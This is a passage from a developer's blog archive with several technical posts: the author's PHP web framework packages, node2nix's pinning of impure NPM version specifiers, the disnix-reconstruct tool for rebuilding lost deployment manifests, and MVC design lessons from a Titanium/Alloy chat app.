  • php-sbeditor. This package provides an HTML editor implementation that can be embedded into a web page. It can also optionally integrate with the data framework to expose a field as an HTML editor. When JavaScript is unsupported or disabled, it will fall back to a text area in which the user can directly edit HTML.
  • php-sblayout. This package provides a layout manager that can be used to manage common sections, the menu structure and dynamic sections of a page. A couple of years ago, I wrote a blog post explaining how it came about. In addition to a PHP package, I also created a Java Servlet/JSP implementation of the same concepts.
  • php-sbcrud is my partial solution to the page-screen mismatch problem and combines the concepts of the data management and layout management packages.

    Using the CRUD manager, every data element and data collection has its own URL, such as http://localhost/index.php/books to display a collection of books and http://localhost/index.php/books/1 to display an individual book. By default, data is displayed in view mode. Modifications can be made by appending GET parameters to the URL, such as: http://localhost/index.php/books/1?__operation=remove_book.
  • php-sbgallery provides an embeddable gallery sub application that can be embedded in various ways -- directly in a page, as a collection of sub pages via the layout manager, in an HTML editor, and as a page manager allowing you to expose albums of the gallery as sub pages in a web application.
  • php-sbpagemanager extends the layout manager with the ability to dynamically manage pages. The page manager can be used to allow end-users to manage the page structure and contents of a web application. It also embeds a picture gallery so that users can manage the images to be displayed.
  • php-sbbiblio is a library I created to display my bibliography on my personal homepage while I was doing my PhD research.

For nowadays' standards the features provided by the above package are considered to be old fashioned. Still, I am particularly proud of the following quality properties (some people may consider them anti-features these days):

  • Being as declarative as possible. This means that the usage of JavaScript is minimized and non essential. Although it may not efficiently deal with the page-screen mismatch because of this deliberate choice, it does provide other benefits. For example, the system is still usable when JavaScript has been disabled and even works in text-oriented browsers.
  • Small page sizes. The layout manager allows you to conveniently separate common aspects from page-specific aspects, including external stylesheets and scripts. As a result, the size of the rendered pages are relatively small (in particular compared to many modern web sites), making page loading times fast.
  • Very thin data layer. The data manager basically works with primitive values, associative arrays and PDO. It has no strong ties to any database model or an Object-Relational-Mapper (ORM). Although this may be inconvenient from a productivity point of view, the little overhead ensures that your application is fast.


In this blog post, I have explained where my initial enthusiasm for the web came from, my experiences (including the negative ones), and my own framework.

The fact that I am not as passionate about the web anymore did not make me leave that domain -- web-based systems these days are ubiquitous. Today, much of the work I do is system configuration, back-end and architecture related. I am not so active on the front-end side anymore, but I still look at front-end related issues from time to time.

Moreover, I have used PHP for a very long time (in 2002 there were basically not that many appealing alternatives), but I have also used many other technologies such a Java Servlets/JSP, Node.js, and Django. Moreover, I have also used many client-side frameworks, such as Angular and React.

I was also briefly involved with the development of WebDSL, an ongoing project in my former research group, but my contributions were mostly system configuration management related.

Although these technologies all offer nice features and in some way impress me, it has been a very long time that I really felt enthusiastic about anything web related.


Three years ago, I have already published the data manager, layout manager and bibliography packages on my GitHub page. I have now also published the remaining components. They can be used under the terms and conditions of the Apache Software License version 2.0.

In addition to the framework components, I published a repository with a number of example applications that have comparable features to the information systems I used to implement. The example applications share the same authentication system and can be combined together through the portal application. The example applications are GPLv3 licensed.

You may probably wonder why I published these packages after such a long time? The are variety of reasons -- I always had the intention to make it open, but when I was younger I focused myself mostly on code, not additional concerns such as documenting how the API should be used or providing example cases.

Moreover, in 2002 platforms such as GitHub did not exist yet (there was Sourceforge, but it worked on a project-level and was not as convenient) so it was very hard to publish something properly.

Finally, there are always things to improve and I always run various kinds of experiments. Typically, I use my own projects as test subjects for other projects. I also have a couple of open ideas where I can use pieces of my web framework for. More about this later.

Friday, March 31, 2017

Subsituting impure version specifiers in node2nix generated package compositions

In a number of previous blog posts, I have described node2nix, a tool that can be used to automatically integrate NPM packages into the Nix packages ecosystem. The biggest challenge in making this integration possible is the fact that NPM does dependency management in addition to build management -- NPM's dependency management properties conflict with Nix's purity principles.

Dealing with a conflicting dependency manager is quite simple from a conceptual perspective -- you must substitute it by a custom implementation that uses Nix to obtain all required dependencies. The remaining responsibilities (such as build management) are left untouched and still have to be carried out by the guest package manager.

Although conceptually simple, implementing such a substitution approach is much more difficult than expected. For example, in my previous blog posts I have described the following techniques:

  • Extracting dependencies. In addition to the package we intend to deploy with Nix, we must also include all its dependencies and transitive dependencies in the generation process.
  • Computing output hashes. In order to make package deployments deterministic, Nix requires that the output hashes of downloads are known in advance. As a result, we must examine all dependencies and compute their corresponding SHA256 output hashes. Some NPM projects have thousands of transitive dependencies that need to be analyzed.
  • Snapshotting versions. Nix uses SHA256 hash codes (derived from all inputs to build a package) to address specific variants or versions of packages whereas version specifiers in NPM package.json configurations are nominal -- they permit version ranges and references to external artifacts (such as Git repositories and external URLs).

    For example, a version range of >= 1.0.3 might resolve to version 1.0.3 today and to version 1.0.4 tomorrow. Translating a version range to a Nix package with a hash code identifier breaks the ability for Nix to guarantee that a package with a specific hash code yields a (nearly) bit identical build.

    To ensure reproducibility, we must snapshot the resolved version of these nominal dependency version specifiers (such as a version range) at generation time and generate the corresponding Nix expression for the resulting snapshot.
  • Simulating shared and private dependencies. In NPM projects, dependencies of a package are stored in the node_modules/ sub folder of the package. Each dependency can have private dependencies by putting them in their corresponding node_modules/ sub folder. Sharing dependencies is also possible by placing the corresponding dependency in any of the parent node_modules/ sub folders.

    Moreover, although this is not explicitly advertised as such, NPM implicitly supports cyclic dependencies and is able cope with them because it will refuse to install a dependency in a node_modules/ sub folder if any parent folder already provides it.

    When generating Nix expressions, we must replicate the exact same behaviour when it comes to private and shared dependencies. This is particularly important to cope with cyclic dependencies -- the Nix package manager does not allow them and we have to break any potential cycles at generation time.
  • Simulating "flat module" installations. In NPM versions older than 3.0, every dependency was installed privately by default unless a shared dependency exists that fits within the required version range.

    In newer NPM versions, this strategy has been reversed -- every dependency will be shared as much as possible until a conflict has been encountered. This means that we have to move dependencies as high up in the node_modules/ folder hierarchy as possible which is an imperative operation -- in Nix this is a problem, because packages are cannot be changed after they have been built.

    To cope with flattening, we must compute the implications of flattening the dependency structure in advance at generation time.

With the above techniques it is possible construct a node_modules/ directory structure having a nearly identical structure that NPM would normally compose with a high degree of accuracy.

Impure version specifiers

Even if it would be possible to reproduce the node_modules/ directory hierarchy with 100% accuracy, there is another problem that remains -- some version specifiers always trigger network communication regardless whether the dependencies have been provided or not, such as:

  { "node2nix": "latest" }
, { "nijs": "git+" }
, { "prom2cb": "github:svanderburg/prom2cb" }

When referring to tags or Git branches, NPM is unable to determine to which version a package resolves. As a consequence, it attempts to retrieve the corresponding packages to investigate even when a compatible version in the node_modules/ directory hierarchy already exists.

While performing package builds, Nix takes various precautions to prevent side effects from influencing builds including network connections. As a result, an NPM package deployment will still fail despite the fact that a compatible dependency has already been provided.

In the package builder Nix expression provided by node2nix, I used to substitute these version specifiers in the package.json configuration files by a wildcard: '*'. Wildcards used to work fine for old Node.js 4.x/NPM 2.x installations, but with NPM 3.x flat module installations they became another big source of problems -- in order to make flat module installations work, NPM needs to know to which version a package resolves to determine whether it can be shared on a higher level in the node_modules/ folder hierarchy or not. Wildcards prevent NPM from making these comparisons, and as a result, some package deployments fail that did not use to fail with older versions of NPM.

Pinpointing version specifiers

In the latest node2nix I have solved these issues by implementing a different substitution strategy -- instead of substituting impure version specifiers by wildcards, I pinpoint all the dependencies to the exact version numbers to which these dependencies resolve. Internally, NPM addresses all dependencies by their names and version numbers only (this also has a number of weird implications, because it disregards the origins of these dependencies, but I will not go into detail on that).

I got the inspiration for this pinpointing strategy from the yarn package manager (an alternative to NPM developed by Facebook) -- when deploying a project with yarn, yarn pinpoints the installed dependencies in a so-called yarn.lock file so that package deployments become reproducible when a system is deployed for a second time.

The pinpointing strategy will always prevent NPM from consulting external resources (under the condition that we have provided the package by our substitute dependency manager first) and always provide version numbers for any dependency so that NPM can perform flat module installations. As a result, the accuracy of node2nix with newer versions of NPM has improved quite a bit.


The pinpointing strategy is part of the latest node2nix that can be obtained from the NPM registry or the Nixpkgs repository.

One month ago, I have given a talk about node2nix at FOSDEM 2017 summarizing the techniques discussed in my blog posts written so far. For convenience, I have embedded the slides into this web page:

Tuesday, March 14, 2017

Reconstructing Disnix deployment configurations

In two earlier blog posts, I have described Dynamic Disnix, an experimental framework enabling self-adaptive redeployment on top of Disnix. The purpose of this framework is to redeploy a service-oriented system whenever the conditions of the environment change, so that the system can still meet its functional and non-functional requirements.

An important category of events that change the environment are machines that crash and disappear from the network -- when a disappearing machine used to host a crucial service, a system can no longer meet its functional requirements. Fortunately, Dynamic Disnix is capable of automatically responding to such events by deploying the missing components elsewhere.

Although Dynamic Disnix supports the recovery of missing services, there is one particular kind of failure I did not take into account. In addition to potentially crashing target machines that host the services of which a service-oriented systems consist, the coordinator machine that initiates the deployment process and stores the deployment state could also disappear. When the deployment state gets lost, it is no longer possible to reliably update the system.

In this blog post, I will describe a new addition to the Disnix toolset that can be used to cope with these kinds of failures by reconstructing a coordinator machine's deployment configuration from the meta data stored on the target machines.

The Disnix upgrade workflow

As explained in earlier blog posts, Disnix requires three kinds of deployment models to carry out a deployment process: a services model capturing the components of which a system consists, an infrastructure model describing the available target machines and their properties, and a distribution model mapping services in the services model to target machines in the infrastructure model. By writing instances of these three models and running the following command-line instruction:

$ disnix-env -s services.nix -i infrastructure.nix -d distribution.nix

Disnix will carry out all activities necessary to deploy the system: building the services and its intra-dependencies from source code, distributing the services and its intra-dependencies, and activating all services in the right order.

When changing any of the models and running the same command-line instruction again, Disnix attempts to upgrade the system by only rebuilding the aspects that have changed, and only deactivating the obsolete services and activating new services.

Disnix (as well as other Nix-related tools) attempt to optimize a redeployment process by only executing the steps that are required to reach a new deployment state. In Disnix, the building and distribution steps are optimized due to the fact that every package is stored in isolation the Nix store in which each package has a unique filename with a hash prefix, such as:


As explained in a number of earlier blog posts, the hash prefix (acv1y1zf7w0i6jx02kfa6gxyn2kfwj3l...) is derived from all inputs used to build the package including its source code, build script, and libraries that it links to. That, for example, means that if we upgrade a system and nothing to the any of inputs of Firefox changes, we get an identical hash and if such a package build already exists, we do not have to build or transfer the package from an external site again.

The building step in Disnix produces a so-called low-level manifest file that is used by tools executing the remaining deployment activities:

<?xml version="1.0"?>
<manifest version="1">

The above manifest file contains the following kinds of information:

  • The distribution element section maps Nix profiles (containing references to all packages implementing the services deployed to the machine) to target machines in the network. This information is used by the distribution step to transfer packages from the coordinator machine to a target machine.
  • The activation element section contains elements specifying which service to activate on which machine in the network including other properties relevant to the activation, such as the type plugin that needs to be invoked that takes care of the activation process. This information is used by the activation step.
  • The targets section contains properties of the machines in the network and is used by all tools that carry out remote deployment steps.
  • There is also an optional snapshots section (not shown in the code fragment above) that contains the properties of services whose state need to be snapshotted, transferred and restored in case their location changes.

When a Disnix (re)deployment process successfully completes, Disnix stores the above manifest as a Disnix coordinator Nix profile on the coorindator machine for future reference with the purpose to optimize the successive upgrade step -- when redeploying a system Disnix will compare the generated manifest with the previously deployed generated instance and only deactivate services that have become obsolete and activating services that are new, making upgrades more efficient than fresh installations.

Unfortunately, when the coordinator machine storing the manifests gets lost, then also the deployment manifest gets lost. As a result, a system can no longer be reliably upgraded -- without deactivating obsolete services, newly deployed services may conflict with services that are already running on the target machines preventing the system from working properly.

Reconstructible manifests

Recently, I have modified Disnix in such a way that the deployment manifests on the coordinator machine can be reconstructed. Each Nix profile that Disnix distributes to a target machine includes a so-called profile manifest file, e.g. /nix/store/aiawhpk5irpjqj25kh6ah6pqfvaifm53-test1/manifest. Previously, this file only contained the Nix store paths to the deployed services and was primarily used by the disnix-query tool to display the installed set of services per machines.

In the latest Disnix, I have changed the format of the profile manifest file to contain all required meta data so that the the activation mappings can be reconstructed on the coordinator machine:

[{ target = "test2"; container = "process"; _key = "4827dfcde5497466b5d218edcd3326327a4174f2b23fd3c9956e664e2386a080"; } { target = "test2"; container = "process"; _key = "b629e50900fe8637c4d3ddf8e37fc5420f2f08a9ecd476648274da63f9e1ebcc"; } { target = "test1"; container = "process"; _key = "d85ba27c57ba626fa63be2520fee356570626674c5635435d9768cf7da943aa3"; }]

The above code fragment shows a portion of the profile manifest. It has a line-oriented structure in which every 7 lines represent the properties of a deployed service. The first line denotes the name of the service, second line the Nix store path, third line the Dysnomia container, fourth line the Dysnomia type, fifth line the hash code derived of all properties, sixth line whether the attached state must be managed by Disnix and the seventh line an encoding of the inter-dependencies.

The other portions of the deployment manifest can be reconstructed as follows: the distribution section can be derived by querying the Nix store paths of the installed profiles on the target machines, the snapshots section by checking which services have been marked as stateful and the targets section can be directly derived from a provided infrastructure model.

With the augmented data in the profile manifests on the target machines, I have developed a tool named disnix-reconstruct that can reconstruct a deployment manifest from all the meta data the manifests on the target machines provide.

I can now, for example, delete all the deployment manifest generations on the coordinator machine:

$ rm /nix/var/nix/profiles/per-user/sander/disnix-coordinator/*

and reconstruct the latest deployment manifest, by running:

$ disnix-reconstruct infrastructure.nix

The above command resolves the full paths to the Nix profiles on the target machines, then downloads their intra-dependency closures to the coordinator machine, reconstructs the deployment manifest from the profile manifests and finally installs the generated deployment manifest.

If the above command succeeds, then we can reliably upgrade a system again with the usual command-line instruction:

$ disnix-env -s services.nix -i infrastructure.nix -d distribution.nix

Extending the self-adaptive deployment framework

In addition to reconstructing deployment manifests that have gone missing, disnix-reconstruct offers another benefit -- the self-adaptive redeployment framework described in the two earlier blog posts is capable of responding to various kinds of events, including redeploying services to other machines when a machine crashes and disappears from the network.

However, when a machine disappears from the network and reappears at a later point in time, Disnix no longer knows about its configuration. When such a machine reappears in the network, this could have disastrous results.

Fortunately, by adding disnix-reconstruct to the framework we can solve this issue:

As shown in the above diagram, whenever a change in the infrastructure is detected, we reconstruct the deployment manifest so that Disnix knows which services are deployed to it. Then when the system is being redeployed, the services on the reappearing machines can also be upgraded or undeployed completely, if needed.

The automatic reconstruction feature can be used by providing the --reconstruct parameter to the self adapt tool:

$ dydisnix-self-adapt -s services.nix -i infrastructure.nix -q qos.nix \


In this blog post, I have described the latest addition to Disnix: disnix-reconstruct that can be used to reconstruct the deployment manifest on the coordinator machine from meta data stored on the target machines. With this addition, we can still update systems if the coordinator machine gets lost.

Furthermore, we can use this addition in the self-adaptive deployment framework to deal with reappearing machines that already have services deployed to them.

Finally, besides developing disnix-reconstruct, I have reached another stable point. As a result, I have decided to release Disnix 0.7. Consult the Disnix homepage for more information.

Sunday, February 12, 2017

MVC lessons in Titanium/Alloy

A while ago, I have ported the simple-xmpp library from the Node.js ecosystem to Appcelerator Titanium to enrich our company's product line with chat functionality. In addition, I have created a bare bones example app that exposes most of the library's features.

Although I am not doing that much front-end development these days, nor consider myself to be a Titanium-guru, I have observed that it is quite challenging to keep your app's code and organization clean.

In this blog post, I will report on my development experiences and describe the architecture that I have derived for the example chat application.

The Model-View-Controller (MVC) architectural pattern

Keeping the code of an end-user application sane is not unique to mobile applications or a specific framework, such as Titanium -- it basically applies to any system with a graphical user interface including desktop applications and web applications.

When diving into the literature or just by searching on the Internet, then you will most likely stumble upon a very common "solution" -- there is the Model-View-Controller (MVC) architectural pattern that can be used as a means to keep your system structured. It is a generically applicable pattern implemented by many kinds of libraries and frameworks for all kinds of domains, including the mobile application space.

The idea behind this pattern is that a system will be separated in three distinct concerns: the model, the view and the controller. The meaning of these concerns are somewhat ambiguously defined. For example, the design patterns book written by the gang of four (Erich Gamma, Richard Helm, Ralph Johnson and John Vlissides) says:

MVC consists of three kinds of objects. The Model is the application object, the View is its screen presentation, and the Controller defines the way the user interface reacts to user input.

The "problem" I have with the above explanation is that it is a bit difficult to grasp the meaning of an "application object". Moreover, the definition of the controller object used in the explanation above, states that it only has a relation with a user interface (a.k.a. the view) while I could also think of many scenarios in which external events are involved without invoking the user interface. I have no idea how to categorize these kinds of interactions by looking at the above description.

The paper that the book cites: "A Cookbook for Using the Model-View-Controller User Interface Paradigm in Smalltalk-80" (written by: Glenn E. Krasner and Stephen T. Pope) provides more detailed definitions. For example, it defines the model as:

The model of an application is the domain-specific software simulation or implementation of the application's central structure.

I particularly find the term "domain-specific" important -- it suggests that a model should encapsulate what matters to the problem domain, without any obfuscations of things not related to it, for example, user interface components.

The paper defines the view as follows:

In this metaphor, views deal with everything graphical: they request data from their model, and display the data

The above definition suggests that views are everything about presentation of objects belonging to the model.

Finally, the paper defines controllers as follows:

Controllers contain the interface between their associated models and views and the input devices (e.g., keyboard, pointing device, time)

In contrast to the design patterns book's definition of a controller, this definition also suggests that a controller has a relationship with the model. Moreover, it does not say anything about interactions with a physical user. Instead, it refers to input devices.

Although the paper provides more detailed definitions, it still remains difficult to draw a hard line from my perspective. For example, what is the scope of MVC? Should it apply to an entire system, or can it also be applied to components of which a system consists?

For example, in an earlier blog post, I wrote a blog post about some of my experiences with web development in which I have developed a simple library MVC-based library managing the layouts of web applications. The model basically encapsulates the structure of a web applications from an abstract point of view, but it only applies to a specific sub concern, not the system as a whole.

Despite its unclarities and ambiguities, I still think MVC makes sense, for the following reasons:

  • View and controller code clutters the model with obfuscations making it much harder to read and maintain.
  • There are multiple ways to present an object visually. With a clear separation between a model and view this becomes much more flexible.
  • In general, more compact modules (in terms of lines of code) is many ways always better than having many lines of code in one module (for example for readability and maintainability). Separation of concerns stimulates reduction of the size of modules.

The Titanium and Alloy frameworks

As explained earlier, I have implemented the chat example app using the Titanium and Alloy frameworks.

Titanium is a framework targeting multiple mobile app platforms (e.g. Android, iOS, Windows and mobile web applications) using JavaScript as an implementation language providing a unified API with minor platform differences. In contrast to platforms such as Java, Titanium is not a write once, run anywhere approach, but a code reuse approach -- according to their information between 60 and 90% of the code can be reused among target platforms.

Moreover, the organization of Titanium's API makes a clear difference between UI and non-UI components, but does not impose anyone to strictly follow an MVC-like organization while implementing an application.

Alloy is a declarative MVC-framework that wraps around Titanium. To cite the Alloy documentation:

Alloy utilizes the model-view-controller (MVC) pattern, which separates the application into three different components:

  • Models provide the business logic, containing the rules, data and state of the application.
  • Views provide the GUI components to the user, either presenting data or allowing the user to interact with the model data.
  • Controllers provide the glue between the model and view components in the form of application logic.

(As may be noticed, the above description introduces yet another slightly different interpretation of the MVC architectural pattern.)

The Alloy framework uses a number of very specific technologies to realize a MVC organization:

  • For the models, it uses the backbone.js framework's model instances to organize the application's data. The framework supports automatic data binding to view components.
  • Views use an XML data encoding capturing the static structure of the view. Moreover, the style of each view is captured in TSS stylesheet (having many similarities with CSS).
  • The controllers are CommonJS modules using JavaScript as an implementation language.

Furthermore, the directory structure of an Alloy application also reflects separation of concerns. For example, each unit of an application stores each concern in a separate directory and file. For example, in the chat app, we can implement each concern of the contacts screen by providing the following files:


The above files reflect each concern of the contacts screen, such as the view, the controller and the style.

In addition to defining models, views, styles and controllers on unit-level, the app unit captures general properties applying of the app.

Organizing the example chat app

Despite the fact that the Alloy framework facilitates separation of concerns in some degree, I still observed that keeping the app's code structure sane remains difficult.

Constructing views

An immediate improvement of Alloy over plain Titanium is that the view code in XML is much better to read than constructing UI components in JavaScript -- the nesting of XML elements reflects the structure of the UI. Furthermore, the style of the UI elements can be separated from the layout improving the readability even further.

For example, the following snippet shows the structure of the login screen:

    <Window class="container">
                <Label>Web socket URL</Label>
                <TextField id="url" hintText="ws://localhost:5280/websocket/" />
                <TextField id="username" hintText="sander" />
                 <Label>Domain name</Label>
                 <TextField id="domain" hintText="localhost" />
                 <TextField id="resource" hintText="" />
                  <TextField id="password" passwordMask="true" hintText="" />
            <Button onClick="doConnect">Connect</Button>

As may be observed, by reading the above code fragment, it becomes quite obvious that we have a window with a scroll view inside. Inside the scroll view, we have multiple views containing a label and text field pair, allowing users to provide their login credentials.

Although implementing most screens in XML is quite straight forward as their structures are quite static, I have noticed that Alloy's technologies are not particularly useful to dynamically compose screen structures, such as the contacts overview that displaying a row for each contact -- the structure of this table changes whenever a new contact gets added or an existing contact removed.

To dynamically compose a screen, I still need to write JavaScript code in the screen's controller. Furthermore, UI elements composed in JavaScript do not take the style settings of the corresponding TSS file into account. As a result, we need to manually provide styling properties while composing the dynamic screen elements.

To keep the controller's code structured and avoiding code repetition, I have encapsulated the construction of table rows into functions.

Notifying views for changes

Another practical issue I ran into is updating the UI components when something changes, such as a receiving a text messaging or an updated status of a contact. An update to a backbone model automatically updates the attached view components, but for anything that is not backbone-based (such as XMPP's internal roster object) this will not work.

I ended up implementing my own custom non-backbone based data model, with my own implementation of the Observer design pattern -- each object in the data model inherits from the Observable prototype providing an infrastructure for observers to register and unregister themselves for notifications. Each view registers itself as an observer to the corresponding model object to update themselves.

The app's architecture

In the end, this is the architecture of the example chat app that I came up with:

The UML diagram shows the following aspects:

  • All classes can be divided into four concerns: controllers, views, models, and utility classes. The observer infrastructure, for example, does in my opinion not belong to any of the MVC-categories, because they are cross cutting.
  • The XMPPEventHandler is considered to be a controller. Despite not triggered by human actions, I still classify it as such. The event handler's only responsibility is to update the corresponding model objects once an event has been received from the XMPP server, such as a chat message.
  • All model objects inherit from a custom-made Observable prototype so that views can register and unregister themselves for update notifications.
  • Views extract information from the model objects to display. Furthermore, each view has its own controller responding to user input, such as button clicks.

Lessons learned

In addition to porting an XMPP library from the Node.js ecosystem to Titanium, I have also observed some recurring challenges when implementing the test application and keeping it structured. Despite the fact that the Alloy framework is MVC-based, it does not guarantee that your application's organization remains structured.

From my experiences, I have learned the following lessons:

  • The roles of each concern in MVC are not well defined, so you need to give your own interpretation to it. For example, I would consider any controller to be an object responding to external events, regardless whether they have been triggered by humans or external systems. By following this interpretation, I ended up implementing the XMPP event handler as a controller.
  • Similarly for the models -- the purpose of backbone.js models is mostly to organize data, but a model is more than just data -- from my perspective, the model encapsulates domain knowledge. This also means that non-backbone objects belong to this domain. The same thing applies to non-data objects, such as functions doing computations.
  • You always have to look at your structure from an aesthetic point of view. Does it makes sense? Is it readable? Can it be simplified?
  • Finally, do not rely on a framework or API to solve all your problems -- study the underlying concepts and remain critical, as a framework does not always guarantee that your organization will be right.

    Within the scope of Titanium/Alloy the problem is that models only make sense if you use backbone models. Using XML markup+TSS for views only make sense if your screen structure is static. The most logical outcome is to put all missing pieces that do not classify themselves into these categories into a controller, but that is probably the most likely reason why your code becomes a mess.

As a final note, the lessons learned do not apply to mobile applications or Titanium/Alloy only -- you will find similar challenges in other domains such as web applications and desktop applications.